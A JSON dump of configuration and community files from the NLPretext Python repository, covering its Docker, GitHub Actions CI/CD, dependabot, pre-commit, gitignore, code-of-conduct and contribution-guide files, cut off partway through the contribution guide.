[
  {
    "path": ".dockerignore",
    "content": "# Git\n.git\n.gitignore\n.github\n\n# Docker\n.dockerignore\ndocker/\n\n# IDE\n.idea\n.vscode\n\n# Byte-compiled / optimized / DLL files\n__pycache__/\n**/__pycache__/\n*.pyc\n*.pyo\n*.pyd\n.Python\n*.py[cod]\n*$py.class\n.pytest_cache/\n..mypy_cache/\n\n# poetry\n.venv\n\n# C extensions\n*.so\n\n# Virtual environment\n.venv\nvenv\n\n.DS_Store\n.AppleDouble\n.LSOverride\n._*\n"
  },
  {
    "path": ".editorconfig",
    "content": "# Check http://editorconfig.org for more information\n# This is the main config file for this project:\nroot = true\n\n[*]\ncharset = utf-8\nend_of_line = lf\ninsert_final_newline = true\nindent_style = space\nindent_size = 2\ntrim_trailing_whitespace = true\n\n[*.{py, pyi}]\nindent_style = space\nindent_size = 4\n\n[Makefile]\nindent_style = tab\n\n[*.md]\ntrim_trailing_whitespace = false\n\n[*.{diff,patch}]\ntrim_trailing_whitespace = false\n"
  },
  {
    "path": ".github/.stale.yml",
    "content": "# Number of days of inactivity before an issue becomes stale\ndaysUntilStale: 60\n# Number of days of inactivity before a stale issue is closed\ndaysUntilClose: 7\n# Issues with these labels will never be considered stale\nexemptLabels:\n  - pinned\n  - security\n# Label to use when marking an issue as stale\nstaleLabel: wontfix\n# Comment to post when marking an issue as stale. Set to `false` to disable\nmarkComment: >\n  This issue has been automatically marked as stale because it has not had\n  recent activity. It will be closed if no further activity occurs. Thank you\n  for your contributions.\n# Comment to post when closing a stale issue. Set to `false` to disable\ncloseComment: false\n"
  },
  {
    "path": ".github/CODEOWNERS",
    "content": "# https://help.github.com/en/articles/about-code-owners\n\n*   @julesbertrand @amaleelhamri @hugovasselin @Guillaume6606\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/bug_report.md",
    "content": "---\nname: 🐛 Bug report\nabout: If something isn't working 🔧\ntitle: ''\nlabels: bug\nassignees:\n---\n\n## 🐛 Bug Report\n\n<!-- A clear and concise description of what the bug is. -->\n\n## 🔬 How To Reproduce\n\nSteps to reproduce the behavior:\n\n1. ...\n\n### Code sample\n\n<!-- If applicable, attach a minimal code sample to reproduce the decried issue. -->\n\n### Environment\n\n* OS: [e.g. Linux / Windows / macOS]\n* Python version, get it with:\n\n```bash\npython --version\n```\n\n### Screenshots\n\n<!-- If applicable, add screenshots to help explain your problem. -->\n\n## 📈 Expected behavior\n\n<!-- A clear and concise description of what you expected to happen. -->\n\n## 📎 Additional context\n\n<!-- Add any other context about the problem here. -->\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/config.yml",
    "content": "# Configuration: https://help.github.com/en/github/building-a-strong-community/configuring-issue-templates-for-your-repository\n\nblank_issues_enabled: false\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/feature_request.md",
    "content": "---\nname: 🚀 Feature request\nabout: Suggest an idea for this project 🏖\ntitle: ''\nlabels: enhancement\nassignees:\n---\n\n## 🚀 Feature Request\n\n<!-- A clear and concise description of the feature proposal. -->\n\n## 🔈 Motivation\n\n<!-- Please describe the motivation for this proposal. -->\n\n## 🛰 Alternatives\n\n<!-- A clear and concise description of any alternative solutions or features you've considered. -->\n\n## 📎 Additional context\n\n<!-- Add any other context or screenshots about the feature request here. -->\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/question.md",
    "content": "---\nname: ❓ Question\nabout: Ask a question about this project 🎓\ntitle: ''\nlabels: question\nassignees:\n---\n\n## Checklist\n\n<!-- Mark with an `x` all the checkboxes that apply (like `[x]`) -->\n\n- [ ] I've searched the project's [`issues`](https://github.com/artefactory/NLPretext}/issues?q=is%3Aissue).\n\n## ❓ Question\n\n<!-- What is your question -->\n\nHow can I [...]?\n\nIs it possible to [...]?\n\n## 📎 Additional context\n\n<!-- Add any other context or screenshots about the feature request here. -->\n"
  },
  {
    "path": ".github/PULL_REQUEST_TEMPLATE.md",
    "content": "## Description\n\n<!-- Add a more detailed description of the changes if needed. -->\n\n## Related Issue\n\n<!-- If your PR refers to a related issue, link it here. -->\n\n## Type of Change\n\n<!-- Mark with an `x` all the checkboxes that apply (like `[x]`) -->\n\n- [ ] 📚 Examples / docs / tutorials / dependencies update\n- [ ] 🔧 Bug fix (non-breaking change which fixes an issue)\n- [ ] 🥂 Improvement (non-breaking change which improves an existing feature)\n- [ ] 🚀 New feature (non-breaking change which adds functionality)\n- [ ] 💥 Breaking change (fix or feature that would cause existing functionality to change)\n- [ ] 🔐 Security fix\n\n## Checklist\n\n<!-- Mark with an `x` all the checkboxes that apply (like `[x]`) -->\n\n- [ ] I've read the [`CODE_OF_CONDUCT.md`](https://github.com/artefactory/NLPretext}/blob/main/CODE_OF_CONDUCT.md) document.\n- [ ] I've read the [`CONTRIBUTING.md`](https://github.com/artefactory/NLPretext}/blob/main/CONTRIBUTING.md) guide.\n- [ ] I've updated the code style using `make format-code`.\n- [ ] I've written tests for all new methods and classes that I created.\n- [ ] I've written the docstring in Google format for all the methods and classes that I used.\n"
  },
  {
    "path": ".github/dependabot.yml",
    "content": "# Configuration: https://dependabot.com/docs/config-file/\n# Docs: https://docs.github.com/en/github/administering-a-repository/keeping-your-dependencies-updated-automatically\n\nversion: 2\n\nupdates:\n  - package-ecosystem: \"pip\"\n    directory: \"/\"\n    schedule:\n      interval: \"weekly\"\n      day: \"monday\"\n      time: \"09:00\"\n    allow:\n      - dependency-type: \"all\"\n    ignore:\n      - dependency-name: \"*\"\n        update-types: [\"version-update:semver-patch\"]\n    labels:\n      - draft\n      - dependencies\n      - python\n  - package-ecosystem: \"github-actions\"\n    directory: \"/\"\n    schedule:\n      interval: \"weekly\"\n      day: \"monday\"\n      time: \"09:00\"\n    allow:\n      - dependency-type: \"all\"\n    labels:\n      - draft\n      - dependencies\n      - github_actions\n  - package-ecosystem: \"docker\"\n    directory: \"/docker/\"\n    schedule:\n      interval: \"weekly\"\n      day: \"monday\"\n      time: \"09:00\"\n    allow:\n      - dependency-type: \"all\"\n    labels:\n      - draft\n      - dependencies\n      - docker\n"
  },
  {
    "path": ".github/release-drafter.yml",
    "content": "# Release drafter configuration https://github.com/release-drafter/release-drafter#configuration\n# Emojis were chosen to match the https://gitmoji.carloscuesta.me/\n\nname-template: \"$NEXT_PATCH_VERSION\"\ntag-template: \"$NEXT_PATCH_VERSION\"\n\ncategories:\n  - title: \":rocket: Features\"\n    labels: [enhancement, feature]\n  - title: \":wrench: Fixes & Refactoring\"\n    labels: [bug, refactoring, bugfix, fix]\n  - title: \":package: Build System & CI/CD\"\n    labels: [build, ci, testing]\n  - title: \":boom: Breaking Changes\"\n    labels: [breaking]\n  - title: \":pencil: Documentation\"\n    labels: [documentation]\n  - title: \":arrow_up: Dependencies updates\"\n    labels: [dependencies]\n\ntemplate: |\n  ## What’s Changed\n\n  $CHANGES\n\n  ## :busts_in_silhouette: List of contributors\n\n  $CONTRIBUTORS\n"
  },
  {
    "path": ".github/workflows/cd.yml",
    "content": "name: Continuous Deployment\non:\n  release:\n    types: [published]\n\njobs:\n\n  docker:\n\n    runs-on: ubuntu-latest\n\n    steps:\n    - name: Checkout\n      uses: actions/checkout@v4\n\n    - name: Set up Docker Buildx\n      uses: docker/setup-buildx-action@v3\n\n    - name: Login to Github Container Registry\n      uses: docker/login-action@v3\n      with:\n        username: ${{ github.actor }}\n        password: ${{ secrets.GITHUB_TOKEN }}\n        registry: ghcr.io\n\n    - name: Set tag name\n      id: tag\n      run: echo \"tag_name=${GITHUB_REF//\\//-}\" >> $GITHUB_OUTPUT\n      env:\n        GITHUB_REF: ${{ github.ref }}\n\n    - name: Build and push\n      uses: docker/build-push-action@v4\n      with:\n        context: .\n        file: ./docker/Dockerfile\n        push: true\n        tags: |\n          ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}\n          ghcr.io/artefactory/nlpretext:latest\n        cache-from: type=registry,ref=ghcr.io/artefactory/nlpretext:latest\n        cache-to: type=inline\n\n    - name: Scan image\n      uses: anchore/scan-action@v3\n      id: scan\n      with:\n        image: \"ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}\"\n        output-format: table\n\n    - name: upload Anchore scan SARIF report\n      if: success() || failure()\n      uses: github/codeql-action/upload-sarif@v1\n      with:\n        sarif_file: ${{ steps.scan.outputs.sarif }}\n\n  documentation_and_package:\n\n    runs-on: ubuntu-latest\n\n    strategy:\n      matrix:\n        python-version: [\"3.8\"]\n\n    steps:\n\n    - name: Checkout\n      uses: actions/checkout@v4\n\n    - name: Set up Python ${{ matrix.python-version }}\n      uses: actions/setup-python@v4\n      with:\n        python-version: ${{ matrix.python-version }}\n\n    - name: Install poetry and pandoc\n      run: |\n        sudo apt-get install pandoc\n        make download-poetry\n\n    - name: Set up cache\n      uses: actions/cache@v3.3.2\n      with:\n        path: ~/.cache/pypoetry/virtualenvs\n        key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }}\n\n    - name: Set Poetry Path\n      run: |\n        echo \"$HOME/.poetry/bin\" >> $GITHUB_PATH\n\n    - name: Install dependencies\n      run: |\n        poetry install -E torch -E dask\n\n    - name: Publish to PyPI\n      env:\n        PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}\n      run: |\n        poetry config pypi-token.pypi $PYPI_TOKEN\n        poetry publish --build\n\n    - name: Run build script for Sphinx pages\n      run: |\n        poetry run git config --global user.name \"Github-Pages Bot\"\n        poetry run git config --global user.email \"github-pages@artefactory.com\"\n        poetry run sh docs/scripts/buildsite.sh\n      shell: bash\n"
  },
  {
    "path": ".github/workflows/ci.yml",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\nname: Continuous Integration\n\non:\n  push:\n    branches:\n      - main\n  pull_request:\n    branches:\n      - '*'\n\njobs:\n  ci:\n    runs-on: ubuntu-latest\n    strategy:\n      matrix:\n        python-version: [\"3.8\", \"3.9\", \"3.10\"]\n    if: ${{ !contains(github.event.pull_request.labels.*.name, 'draft') }}\n\n    steps:\n    - uses: actions/checkout@v2\n\n    - name: Set up Python ${{ matrix.python-version }}\n      uses: actions/setup-python@v4\n      with:\n        python-version: ${{ matrix.python-version }}\n        cache: 'pip'\n\n    - name: Install poetry\n      run: make download-poetry\n\n    - name: Set up pip cache\n      uses: actions/cache@v3.3.2\n      with:\n        path: ~/.cache/pypoetry/virtualenvs\n        key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }}\n\n    - name: Set up mypy cache\n      uses: actions/cache@v3.2.4\n      with:\n        path: ${{ github.workspace }}/.mypy_cache\n        key: mypy-${{ matrix.python-version }}\n\n    - name: Set Poetry Path\n      run: |\n        echo \"$HOME/.poetry/bin\" >> $GITHUB_PATH\n\n    - name: Install dependencies\n      run: |\n        poetry run pip install --upgrade pip\n        poetry install -E torch -E dask\n\n    - name: Run safety checks\n      run: |\n        STRICT=1 make check-safety\n\n    - name: Lint and format\n      run: |\n        make format-code\n\n    - name: Run tests\n      run: |\n        make test\n"
  },
  {
    "path": ".github/workflows/greetings.yml",
    "content": "name: Greetings\n\non:\n  pull_request:\n    types:\n      - opened\n      - reopened\n      - edited\n      - labeled\n      - unlabeled\n      - synchronize\n  issues:\n\njobs:\n  greeting:\n    runs-on: ubuntu-latest\n    if: ${{ !contains(github.head_ref, 'dependabot/') }}\n    steps:\n    - uses: actions/first-interaction@v1\n      with:\n        repo-token: ${{ secrets.GITHUB_TOKEN }}\n        pr-message:  'Hello @${{ github.actor }}, thank you for submitting a PR! We will respond as soon as possible.'\n        issue-message: |\n          Hello @${{ github.actor }}, thank you for your interest in our work!\n\n          If this is a bug report, please provide screenshots and **minimum viable code to reproduce your issue**, otherwise we can not help you.\n"
  },
  {
    "path": ".github/workflows/release-drafter.yml",
    "content": "name: Release Drafter\n\non:\n  push:\n    # branches to consider in the event; optional, defaults to all\n    branches:\n      - main\n\njobs:\n  update_release_draft:\n    runs-on: ubuntu-latest\n    steps:\n      # Drafts your next Release notes as Pull Requests are merged into \"main\"\n      - uses: release-drafter/release-drafter@v5.22.0\n        env:\n          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}\n"
  },
  {
    "path": ".gitignore",
    "content": "# Created by https://www.gitignore.io/api/osx,python,pycharm,windows,visualstudio,visualstudiocode\n# Edit at https://www.gitignore.io/?templates=osx,python,pycharm,windows,visualstudio,visualstudiocode\n\n### OSX ###\n# General\n.DS_Store\n.AppleDouble\n.LSOverride\n\n# Icon must end with two \\r\nIcon\n\n# Thumbnails\n._*\n\n# Files that might appear in the root of a volume\n.DocumentRevisions-V100\n.fseventsd\n.Spotlight-V100\n.TemporaryItems\n.Trashes\n.VolumeIcon.icns\n.com.apple.timemachine.donotpresent\n\n# Directories potentially created on remote AFP share\n.AppleDB\n.AppleDesktop\nNetwork Trash Folder\nTemporary Items\n.apdisk\n\n### PyCharm ###\n# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm\n# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839\n\n# User-specific stuff\n.idea/\n.idea/**/workspace.xml\n.idea/**/tasks.xml\n.idea/**/usage.statistics.xml\n.idea/**/dictionaries\n.idea/**/shelf\n\n# Generated files\n.idea/**/contentModel.xml\n\n# Sensitive or high-churn files\n.idea/**/dataSources/\n.idea/**/dataSources.ids\n.idea/**/dataSources.local.xml\n.idea/**/sqlDataSources.xml\n.idea/**/dynamic.xml\n.idea/**/uiDesigner.xml\n.idea/**/dbnavigator.xml\n\n# Gradle\n.idea/**/gradle.xml\n.idea/**/libraries\n\n# Gradle and Maven with auto-import\n# When using Gradle or Maven with auto-import, you should exclude module files,\n# since they will be recreated, and may cause churn.  Uncomment if using\n# auto-import.\n# .idea/modules.xml\n# .idea/*.iml\n# .idea/modules\n# *.iml\n# *.ipr\n\n# CMake\ncmake-build-*/\n\n# Mongo Explorer plugin\n.idea/**/mongoSettings.xml\n\n# File-based project format\n*.iws\n\n# IntelliJ\nout/\n\n# mpeltonen/sbt-idea plugin\n.idea_modules/\n\n# JIRA plugin\natlassian-ide-plugin.xml\n\n# Cursive Clojure plugin\n.idea/replstate.xml\n\n# Crashlytics plugin (for Android Studio and IntelliJ)\ncom_crashlytics_export_strings.xml\ncrashlytics.properties\ncrashlytics-build.properties\nfabric.properties\n\n# Editor-based Rest Client\n.idea/httpRequests\n\n# Android studio 3.1+ serialized cache file\n.idea/caches/build_file_checksums.ser\n\n### PyCharm Patch ###\n# Comment Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-215987721\n\n# *.iml\n# modules.xml\n# .idea/misc.xml\n# *.ipr\n\n# Sonarlint plugin\n.idea/**/sonarlint/\n\n# SonarQube Plugin\n.idea/**/sonarIssues.xml\n\n# Markdown Navigator plugin\n.idea/**/markdown-navigator.xml\n.idea/**/markdown-navigator/\n\n### Python ###\n# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\n*$py.class\n\n# C extensions\n*.so\n\n# Distribution / packaging\n.Python\nenv/\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib/\nlib64/\nparts/\nsdist/\nvar/\nwheels/\npip-wheel-metadata/\nshare/python-wheels/\n*.egg-info/\n.installed.cfg\n*.egg\nMANIFEST\n\n# PyInstaller\n#  Usually these files are written by a python script from a template\n#  before PyInstaller builds the exe, so as to inject date/other infos into it.\n*.manifest\n*.spec\n\n# Installer logs\npip-log.txt\npip-delete-this-directory.txt\n\n# Unit test / coverage reports\nhtmlcov/\n.tox/\n.nox/\n.coverage\n.coverage.*\n.cache\nnosetests.xml\ncoverage.xml\n*.cover\n.hypothesis/\n.pytest_cache/\n.ruff_cache/\n\n# Translations\n*.mo\n*.pot\n\n# Scrapy stuff:\n.scrapy\n\n# Django stuff:\n*.log\n\n# Sphinx documentation\ndocs/_build/\n\n# PyBuilder\ntarget/\n\n# pyenv\n.python-version\n\n# poetry\n.venv\n\n# pipenv\n#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.\n#   However, in case of collaboration, if having platform-specific dependencies or dependencies\n#   having no cross-platform support, pipenv may install dependencies that don't work, or not\n#   install all needed dependencies.\n#Pipfile.lock\n\n# celery beat schedule file\ncelerybeat-schedule\n\n# SageMath parsed files\n*.sage.py\n\n# Spyder project settings\n.spyderproject\n.spyproject\n\n# Rope project settings\n.ropeproject\n\n# Mr Developer\n.mr.developer.cfg\n.project\n.pydevproject\n\n# mkdocs documentation\n/site\n\n# mypy\n.mypy_cache/\n.dmypy.json\ndmypy.json\n\n# Pyre type checker\n.pyre/\n\n# Plugins\n.secrets.baseline\n\n### VisualStudioCode ###\n.vscode/*\n!.vscode/tasks.json\n!.vscode/launch.json\n!.vscode/extensions.json\n\n### VisualStudioCode Patch ###\n# Ignore all local history of files\n.history\n\n### Windows ###\n# Windows thumbnail cache files\nThumbs.db\nThumbs.db:encryptable\nehthumbs.db\nehthumbs_vista.db\n\n# Dump file\n*.stackdump\n\n# Folder config file\n[Dd]esktop.ini\n\n# Recycle Bin used on file shares\n$RECYCLE.BIN/\n\n# Windows Installer files\n*.cab\n*.msi\n*.msix\n*.msm\n*.msp\n\n# Windows shortcuts\n*.lnk\n\n### VisualStudio ###\n## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore\n\n# User-specific files\n*.rsuser\n*.suo\n*.user\n*.userosscache\n*.sln.docstates\n\n# User-specific files (MonoDevelop/Xamarin Studio)\n*.userprefs\n\n# Mono auto generated files\nmono_crash.*\n\n# Build results\n[Dd]ebug/\n[Dd]ebugPublic/\n[Rr]elease/\n[Rr]eleases/\nx64/\nx86/\n[Aa][Rr][Mm]/\n[Aa][Rr][Mm]64/\nbld/\n[Bb]in/\n[Oo]bj/\n[Ll]og/\n\n# Visual Studio 2015/2017 cache/options directory\n.vs/\n# Uncomment if you have tasks that create the project's static files in wwwroot\n#wwwroot/\n\n# Visual Studio 2017 auto generated files\nGenerated\\ Files/\n\n# MSTest test Results\n[Tt]est[Rr]esult*/\n[Bb]uild[Ll]og.*\n\n# NUnit\n*.VisualState.xml\nTestResult.xml\nnunit-*.xml\n\n# Build Results of an ATL Project\n[Dd]ebugPS/\n[Rr]eleasePS/\ndlldata.c\n\n# Benchmark Results\nBenchmarkDotNet.Artifacts/\n\n# .NET Core\nproject.lock.json\nproject.fragment.lock.json\nartifacts/\n\n# StyleCop\nStyleCopReport.xml\n\n# Files built by Visual Studio\n*_i.c\n*_p.c\n*_h.h\n*.ilk\n*.obj\n*.iobj\n*.pch\n*.pdb\n*.ipdb\n*.pgc\n*.pgd\n*.rsp\n*.sbr\n*.tlb\n*.tli\n*.tlh\n*.tmp\n*.tmp_proj\n*_wpftmp.csproj\n*.vspscc\n*.vssscc\n.builds\n*.pidb\n*.svclog\n*.scc\n\n# Chutzpah Test files\n_Chutzpah*\n\n# Visual C++ cache files\nipch/\n*.aps\n*.ncb\n*.opendb\n*.opensdf\n*.sdf\n*.cachefile\n*.VC.db\n*.VC.VC.opendb\n\n# Visual Studio profiler\n*.psess\n*.vsp\n*.vspx\n*.sap\n\n# Visual Studio Trace Files\n*.e2e\n\n# TFS 2012 Local Workspace\n$tf/\n\n# Guidance Automation Toolkit\n*.gpState\n\n# ReSharper is a .NET coding add-in\n_ReSharper*/\n*.[Rr]e[Ss]harper\n*.DotSettings.user\n\n# JustCode is a .NET coding add-in\n.JustCode\n\n# TeamCity is a build add-in\n_TeamCity*\n\n# DotCover is a Code Coverage Tool\n*.dotCover\n\n# AxoCover is a Code Coverage Tool\n.axoCover/*\n!.axoCover/settings.json\n\n# Visual Studio code coverage results\n*.coverage\n*.coveragexml\n\n# NCrunch\n_NCrunch_*\n.*crunch*.local.xml\nnCrunchTemp_*\n\n# MightyMoose\n*.mm.*\nAutoTest.Net/\n\n# Web workbench (sass)\n.sass-cache/\n\n# Installshield output folder\n[Ee]xpress/\n\n# DocProject is a documentation generator add-in\nDocProject/buildhelp/\nDocProject/Help/*.HxT\nDocProject/Help/*.HxC\nDocProject/Help/*.hhc\nDocProject/Help/*.hhk\nDocProject/Help/*.hhp\nDocProject/Help/Html2\nDocProject/Help/html\n\n# Click-Once directory\npublish/\n\n# Publish Web Output\n*.[Pp]ublish.xml\n*.azurePubxml\n# Note: Comment the next line if you want to checkin your web deploy settings,\n# but database connection strings (with potential passwords) will be unencrypted\n*.pubxml\n*.publishproj\n\n# Microsoft Azure Web App publish settings. Comment the next line if you want to\n# checkin your Azure Web App publish settings, but sensitive information contained\n# in these scripts will be unencrypted\nPublishScripts/\n\n# NuGet Packages\n*.nupkg\n# NuGet Symbol Packages\n*.snupkg\n# The packages folder can be ignored because of Package Restore\n**/[Pp]ackages/*\n# except build/, which is used as an MSBuild target.\n!**/[Pp]ackages/build/\n# Uncomment if necessary however generally it will be regenerated when needed\n#!**/[Pp]ackages/repositories.config\n# NuGet v3's project.json files produces more ignorable files\n*.nuget.props\n*.nuget.targets\n\n# Microsoft Azure Build Output\ncsx/\n*.build.csdef\n\n# Microsoft Azure Emulator\necf/\nrcf/\n\n# Windows Store app package directories and files\nAppPackages/\nBundleArtifacts/\nPackage.StoreAssociation.xml\n_pkginfo.txt\n*.appx\n*.appxbundle\n*.appxupload\n\n# Visual Studio cache files\n# files ending in .cache can be ignored\n*.[Cc]ache\n# but keep track of directories ending in .cache\n!?*.[Cc]ache/\n\n# Others\nClientBin/\n~$*\n*~\n*.dbmdl\n*.dbproj.schemaview\n*.jfm\n*.pfx\n*.publishsettings\norleans.codegen.cs\n\n# Including strong name files can present a security risk\n# (https://github.com/github/gitignore/pull/2483#issue-259490424)\n#*.snk\n\n# Since there are multiple workflows, uncomment next line to ignore bower_components\n# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)\n#bower_components/\n\n# RIA/Silverlight projects\nGenerated_Code/\n\n# Backup & report files from converting an old project file\n# to a newer Visual Studio version. Backup files are not needed,\n# because we have git ;-)\n_UpgradeReport_Files/\nBackup*/\nUpgradeLog*.XML\nUpgradeLog*.htm\nServiceFabricBackup/\n*.rptproj.bak\n\n# SQL Server files\n*.mdf\n*.ldf\n*.ndf\n\n# Business Intelligence projects\n*.rdl.data\n*.bim.layout\n*.bim_*.settings\n*.rptproj.rsuser\n*- [Bb]ackup.rdl\n*- [Bb]ackup ([0-9]).rdl\n*- [Bb]ackup ([0-9][0-9]).rdl\n\n# Microsoft Fakes\nFakesAssemblies/\n\n# GhostDoc plugin setting file\n*.GhostDoc.xml\n\n# Node.js Tools for Visual Studio\n.ntvs_analysis.dat\nnode_modules/\n\n# Visual Studio 6 build log\n*.plg\n\n# Visual Studio 6 workspace options file\n*.opt\n\n# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)\n*.vbw\n\n# Visual Studio LightSwitch build output\n**/*.HTMLClient/GeneratedArtifacts\n**/*.DesktopClient/GeneratedArtifacts\n**/*.DesktopClient/ModelManifest.xml\n**/*.Server/GeneratedArtifacts\n**/*.Server/ModelManifest.xml\n_Pvt_Extensions\n\n# Paket dependency manager\n.paket/paket.exe\npaket-files/\n\n# FAKE - F# Make\n.fake/\n\n# CodeRush personal settings\n.cr/personal\n\n# Python Tools for Visual Studio (PTVS)\n*.pyc\n\n# Cake - Uncomment if you are using it\n# tools/**\n# !tools/packages.config\n\n# Tabs Studio\n*.tss\n\n# Telerik's JustMock configuration file\n*.jmconfig\n\n# BizTalk build output\n*.btp.cs\n*.btm.cs\n*.odx.cs\n*.xsd.cs\n\n# OpenCover UI analysis results\nOpenCover/\n\n# Azure Stream Analytics local run output\nASALocalRun/\n\n# MSBuild Binary and Structured Log\n*.binlog\n\n# NVidia Nsight GPU debugger configuration file\n*.nvuser\n\n# MFractors (Xamarin productivity tool) working folder\n.mfractor/\n\n# Local History for Visual Studio\n.localhistory/\n\n# BeatPulse healthcheck temp database\nhealthchecksdb\n\n# Backup folder for Package Reference Convert tool in Visual Studio 2017\nMigrationBackup/\n\n# DotEnv configuration\n.env\n\n# Database\n*.db\n*.rdb\n\n# Pycharm\n.idea\nvenv/\n\n# VS Code\n.vscode/\n\n# Spyder\n.spyproject/\n\n# Jupyter NB Checkpoints\n.ipynb_checkpoints/\n\n# exclude data from source control by default\n\n\n# vim\n*.swp\n*.swo\n\ndata/\n"
  },
  {
    "path": ".pre-commit-config.yaml",
    "content": "default_language_version:\n  python: python3.10\n\n\nrepos:\n  - repo: https://github.com/pre-commit/pre-commit-hooks\n    rev: v4.5.0\n    hooks:\n    - id: trailing-whitespace\n    - id: end-of-file-fixer\n    - id: check-yaml\n    - id: check-toml\n    - id: check-json\n    - id: check-added-large-files\n\n  - repo: local\n    hooks:\n      - id: isort\n        name: isort\n        entry: poetry run isort --settings-path pyproject.toml\n        types: [python]\n        language: system\n        stages: [commit, push]\n      - id: pyupgrade\n        name: pyupgrade\n        entry: poetry run pyupgrade --py38-plus\n        types: [python]\n        language: system\n        stages: [commit, push]\n      - id: black\n        name: black\n        entry: poetry run black --config pyproject.toml\n        types: [python]\n        language: system\n        stages: [commit, push]\n      - id: ruff\n        name: ruf\n        entry: poetry run ruff check --config pyproject.toml\n        types: [python]\n        language: system\n        stages: [commit, push]\n      - id: mypy\n        name: mypy\n        entry: poetry run mypy\n        require_serial: true\n        types: [python]\n        language: system\n        stages: [push]\n      - id: gitleaks\n        name: gitleaks\n        entry: make gitleaks\n        require_serial: true\n        types: [file]\n        language: system\n        pass_filenames: false\n        stages: [push]\n"
  },
  {
    "path": "CODE_OF_CONDUCT.md",
    "content": "# Contributor Covenant Code of Conduct\n\n## Our Pledge\n\nIn the interest of fostering an open and welcoming environment, we as\ncontributors and maintainers pledge to making participation in our project and\nour community a harassment-free experience for everyone, regardless of age, body\nsize, disability, ethnicity, sex characteristics, gender identity and expression,\nlevel of experience, education, socio-economic status, nationality, personal\nappearance, race, religion, or sexual identity and orientation.\n\n## Our Standards\n\nExamples of behavior that contributes to creating a positive environment\ninclude:\n\n* Using welcoming and inclusive language\n* Being respectful of differing viewpoints and experiences\n* Gracefully accepting constructive criticism\n* Focusing on what is best for the community\n* Showing empathy towards other community members\n\nExamples of unacceptable behavior by participants include:\n\n* The use of sexualized language or imagery and unwelcome sexual attention or\n advances\n* Trolling, insulting/derogatory comments, and personal or political attacks\n* Public or private harassment\n* Publishing others' private information, such as a physical or electronic\n address, without explicit permission\n* Other conduct which could reasonably be considered inappropriate in a\n professional setting\n\n## Our Responsibilities\n\nProject maintainers are responsible for clarifying the standards of acceptable\nbehavior and are expected to take appropriate and fair corrective action in\nresponse to any instances of unacceptable behavior.\n\nProject maintainers have the right and responsibility to remove, edit, or\nreject comments, commits, code, wiki edits, issues, and other contributions\nthat are not aligned to this Code of Conduct, or to ban temporarily or\npermanently any contributor for other behaviors that they deem inappropriate,\nthreatening, offensive, or harmful.\n\n## Scope\n\nThis Code of Conduct applies both within project spaces and in public spaces\nwhen an individual is representing the project or its community. Examples of\nrepresenting a project or community include using an official project e-mail\naddress, posting via an official social media account, or acting as an appointed\nrepresentative at an online or offline event. Representation of a project may be\nfurther defined and clarified by project maintainers.\n\n## Enforcement\n\nInstances of abusive, harassing, or otherwise unacceptable behavior may be\nreported by contacting the project team at rafaelle.aygalenq@artefact.com. All\ncomplaints will be reviewed and investigated and will result in a response that\nis deemed necessary and appropriate to the circumstances. The project team is\nobligated to maintain confidentiality with regard to the reporter of an incident.\nFurther details of specific enforcement policies may be posted separately.\n\nProject maintainers who do not follow or enforce the Code of Conduct in good\nfaith may face temporary or permanent repercussions as determined by other\nmembers of the project's leadership.\n\n## Attribution\n\nThis Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,\navailable at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html\n\n[homepage]: https://www.contributor-covenant.org\n\nFor answers to common questions about this code of conduct, see\nhttps://www.contributor-covenant.org/faq\n"
  },
  {
    "path": "CONTRIBUTING.md",
    "content": "NLPretext\n==============================\n\n# How to contribute\n\n## Dependencies\n\nWe use `poetry` to manage the [dependencies](https://github.com/python-poetry/poetry).\nIf you dont have `poetry` installed, you should run the command below.\n\n```bash\nmake download-poetry; export PATH=\"$HOME/.local/bin:$PATH\"\n```\n\nTo install dependencies and prepare [`pre-commit`](https://pre-commit.com/) hooks you would need to run `install` command:\n\n```bash\nmake install\n```\n\nTo activate your `virtualenv` run `poetry shell`.\n\n## Codestyle\n\nAfter you run `make install` you can execute the automatic code formatting.\n\n```bash\nmake format-code\n```\n\n### Checks\n\nMany checks are configured for this project. Command `make check-style` will run black diffs, darglint docstring style and mypy.\nThe `make check-safety` command will look at the security of your code.\n\nYou can also use `STRICT=1` flag to make the check be strict.\n\n### Before submitting\n\nBefore submitting your code please do the following steps:\n\n1. Add any changes you want\n1. Add tests for the new changes\n1. Edit documentation if you have changed something significant\n1. Run `make format-code` to format your changes.\n1. Run `STRICT=1 make check-style` to ensure that types and docs are correct\n1. Run `STRICT=1 make check-safety` to ensure that security of your code is correct\n\n## Other 